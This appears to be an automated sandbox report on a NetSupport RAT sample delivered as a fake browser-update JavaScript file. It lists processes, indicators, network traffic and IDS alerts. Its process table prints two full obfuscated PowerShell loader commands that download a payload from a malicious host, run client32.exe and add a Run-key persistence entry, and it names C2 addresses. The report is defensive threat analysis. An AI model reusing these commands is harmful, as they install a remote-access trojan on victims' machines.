| File name: | MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip |
| Full analysis: | https://app.any.run/tasks/571f513b-9c4a-4ea9-8c8c-bb50fba67a4f |
| Verdict: | Malicious activity |
| Threats: | NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software. |
| Analysis date: | May 14, 2024, 22:27:00 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 781BCA08C51BA9B4D1B9AAFD23A79465 |
| SHA1: | 6F898F945CB9BA27FEF50AC4C47FBE2079CE2A76 |
| SHA256: | 07ED8EBCAFC757D5C6122840F42678C0F00B8C0C769A7BD4A9DBAD6859EE7A48 |
| SSDEEP: | 49152:QwnjVvep/MJEcusnkROZ2CITqdCqPYGI3D4wGF35BgesARIzM0FTqdwhB2JLB9z9:9jJepE3kIZhdCEDs0wU35iesAEXkwhgn |
MALICIOUS
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Unusual connection from system programs
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Bypass execution policy to execute commands
- powershell.exe (PID: 1236)
- powershell.exe (PID: 1932)
Changes powershell execution policy (Bypass)
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Drops the executable file immediately after the start
- powershell.exe (PID: 1236)
NETSUPPORT has been detected (SURICATA)
- client32.exe (PID: 736)
Connects to the CnC server
- client32.exe (PID: 736)
SUSPICIOUS
The process executes JS scripts
- WinRAR.exe (PID: 3984)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 3984)
- client32.exe (PID: 736)
Adds/modifies Windows certificates
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Reads the Internet Settings
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
- powershell.exe (PID: 1236)
- powershell.exe (PID: 1932)
- client32.exe (PID: 736)
Contacting a server suspected of hosting an Exploit Kit
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Uses RUNDLL32.EXE to load library
- WinRAR.exe (PID: 3984)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
The process bypasses the loading of PowerShell profile settings
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Probably download files using WebClient
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Probably obfuscated PowerShell command line is found
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Unusual connection from system programs
- powershell.exe (PID: 1236)
- powershell.exe (PID: 1932)
Runs shell command (SCRIPT)
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 1236)
The Powershell connects to the Internet
- powershell.exe (PID: 1236)
- powershell.exe (PID: 1932)
Gets path to any of the special folders (POWERSHELL)
- powershell.exe (PID: 1236)
Powershell scripting: start process
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
Process drops legitimate windows executable
- powershell.exe (PID: 1236)
Executable content was dropped or overwritten
- powershell.exe (PID: 1236)
The process drops C-runtime libraries
- powershell.exe (PID: 1236)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 1236)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 1236)
Potential Corporate Privacy Violation
- client32.exe (PID: 736)
Contacting a server suspected of hosting an CnC
- client32.exe (PID: 736)
INFO
Checks proxy server information
- wscript.exe (PID: 4024)
- wscript.exe (PID: 4072)
- client32.exe (PID: 736)
Checks supported languages
- wmpnscfg.exe (PID: 336)
- client32.exe (PID: 736)
Reads the computer name
- wmpnscfg.exe (PID: 336)
- client32.exe (PID: 736)
Manual execution by a user
- wmpnscfg.exe (PID: 336)
Gets or sets the time when the file was last written to (POWERSHELL)
- powershell.exe (PID: 1236)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 1236)
Drop NetSupport executable file
- powershell.exe (PID: 1236)
The executable file from the user directory is run by the Powershell process
- client32.exe (PID: 736)
Reads the machine GUID from the registry
- client32.exe (PID: 736)
Creates files or folders in the user directory
- client32.exe (PID: 736)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0001 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:05:14 21:50:02 |
| ZipCRC: | 0x5ea2ad05 |
| ZipCompressedSize: | 1526049 |
| ZipUncompressedSize: | 6725136 |
| ZipFileName: | Update_123.0.6312.111.js |
Total processes
45
Monitored processes
8
Malicious processes
5
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 336 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 736 | "C:\Users\admin\AppData\Roaming\DIVX20\client32.exe" | C:\Users\admin\AppData\Roaming\DIVX20\client32.exe | powershell.exe | ||||||||||||
User: admin Company: NetSupport Ltd Integrity Level: MEDIUM Description: NetSupport Client Application Version: V12.00 Modules
| |||||||||||||||
| 1112 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\dsquery.dll,OpenSavedDsQuery C:\Users\admin\AppData\Local\Temp\ndh2ya4g.qds | C:\Windows\System32\rundll32.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1236 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ugsgpBXKURSGMOPyJSAAZTiURsMLaNVQa='https://redsquardhack.com/data.php?6598';$ycMwWdjvGdcuPPRRpSpneOFtH=(New-Object System.Net.WebClient).DownloadString($ugsgpBXKURSGMOPyJSAAZTiURsMLaNVQa);$krelfYBmKwloed=[System.Convert]::FromBase64String($ycMwWdjvGdcuPPRRpSpneOFtH);$zxc = Get-Random -Minimum -10 -Maximum 37; $xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl -PathType Container)) { New-Item -Path $xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl -ItemType Directory };$p=Join-Path $xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl 'ah.zip';[System.IO.File]::WriteAllBytes($p,$krelfYBmKwloed);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl -Force; $AZ.attributes='Hidden';$s=$xKWMWwteiLlFqBAzYchBcFjYinFnJkQROVl+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1932 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $piuMHYoRiZnFASUeI='https://redsquardhack.com/data.php?11604';$UCHgiyVfJDFvmiumLWfRzYDl=(New-Object System.Net.WebClient).DownloadString($piuMHYoRiZnFASUeI);$XYsnTGMagxONVLdEIGbSUbuDYiMvJzegif=[System.Convert]::FromBase64String($UCHgiyVfJDFvmiumLWfRzYDl);$zxc = Get-Random -Minimum -10 -Maximum 37; $ucyNllTKLyryFZFcENp=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $ucyNllTKLyryFZFcENp -PathType Container)) { New-Item -Path $ucyNllTKLyryFZFcENp -ItemType Directory };$p=Join-Path $ucyNllTKLyryFZFcENp 'ah.zip';[System.IO.File]::WriteAllBytes($p,$XYsnTGMagxONVLdEIGbSUbuDYiMvJzegif);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ucyNllTKLyryFZFcENp)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ucyNllTKLyryFZFcENp 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $ucyNllTKLyryFZFcENp -Force; $AZ.attributes='Hidden';$s=$ucyNllTKLyryFZFcENp+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3984 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 4024 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3984.44604\Update_123.0.6312.111.js" | C:\Windows\System32\wscript.exe | WinRAR.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 4072 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3984.45667\Update_123.0.6312.111.js" | C:\Windows\System32\wscript.exe | WinRAR.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
Total events
28 152
Read events
27 883
Write events
206
Delete events
63
Modification events
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3984) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
Executable files
32
Suspicious files
14
Text files
6
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3984 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3984.44604\Update_123.0.6312.111.js | — | |
MD5:— | SHA256:— | |||
| 3984 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3984.45667\Update_123.0.6312.111.js | — | |
MD5:— | SHA256:— | |||
| 4024 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\update[1].js | — | |
MD5:— | SHA256:— | |||
| 4072 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\update[1].js | — | |
MD5:— | SHA256:— | |||
| 4024 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:822467B728B7A66B081C91795373789A | SHA256:AF2343382B88335EEA72251AD84949E244FF54B6995063E24459A7216E9576B9 | |||
| 4024 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:E74F340ADE4453009A191FB633D58185 | SHA256:24AE83167805AC421D1259876F99D00F65EA766D75B4219EDC19638F700CBCDF | |||
| 1236 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ouhggjpz.303.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 4024 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:9C9C34E8A30692ED737364E3B21DE33E | SHA256:BEC4D9AE902ED8C9A2B40E49058E0D9EE05E6A6895B0AAE0C4BF0B719B735C18 | |||
| 1236 | powershell.exe | C:\Users\admin\AppData\Local\Temp\v3hhmrt3.q23.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 1236 | powershell.exe | C:\Users\admin\AppData\Roaming\DIVX20\QWhale.Editor.dll | executable | |
MD5:EAA268802C633F27FCFC90FD0F986E10 | SHA256:FE26C7E4723BF81124CDCFD5211B70F5E348250AE74B6C0ABC326F1084EC3D54 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
13
DNS requests
6
Threats
15
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4024 | wscript.exe | GET | 304 | 87.248.204.0:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?d22e69cee3fc1e30 | unknown | — | — | unknown |
4024 | wscript.exe | GET | 200 | 2.19.217.103:80 | http://x1.c.lencr.org/ | unknown | — | — | unknown |
4024 | wscript.exe | GET | 200 | 95.100.146.41:80 | http://r3.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgMlsNRuEWX7Mma%2BFnjNb168Hw%3D%3D | unknown | — | — | unknown |
736 | client32.exe | GET | 200 | 104.26.1.231:80 | http://geo.netsupportsoftware.com/location/loca.asp | unknown | — | — | unknown |
736 | client32.exe | POST | 200 | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
736 | client32.exe | POST | — | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
736 | client32.exe | POST | 200 | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
736 | client32.exe | POST | — | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4024 | wscript.exe | 45.89.53.17:443 | firstaischool.com | — | UA | unknown |
4024 | wscript.exe | 87.248.204.0:80 | ctldl.windowsupdate.com | LLNW | US | unknown |
4024 | wscript.exe | 2.19.217.103:80 | x1.c.lencr.org | Akamai International B.V. | NL | unknown |
4024 | wscript.exe | 95.100.146.41:80 | r3.o.lencr.org | Akamai International B.V. | CZ | unknown |
4072 | wscript.exe | 45.89.53.17:443 | firstaischool.com | — | UA | unknown |
1236 | powershell.exe | 45.89.53.18:443 | redsquardhack.com | — | UA | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
firstaischool.com |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
r3.o.lencr.org |
| shared |
redsquardhack.com |
| unknown |
geo.netsupportsoftware.com |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1088 | svchost.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (firstaischool .com) |
4024 | wscript.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in TLS SNI (firstaischool .com) |
4072 | wscript.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in TLS SNI (firstaischool .com) |
736 | client32.exe | Potential Corporate Privacy Violation | ET POLICY NetSupport GeoLocation Lookup Request |
736 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
736 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
736 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
736 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
736 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
736 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
3 ETPRO signatures available at the full report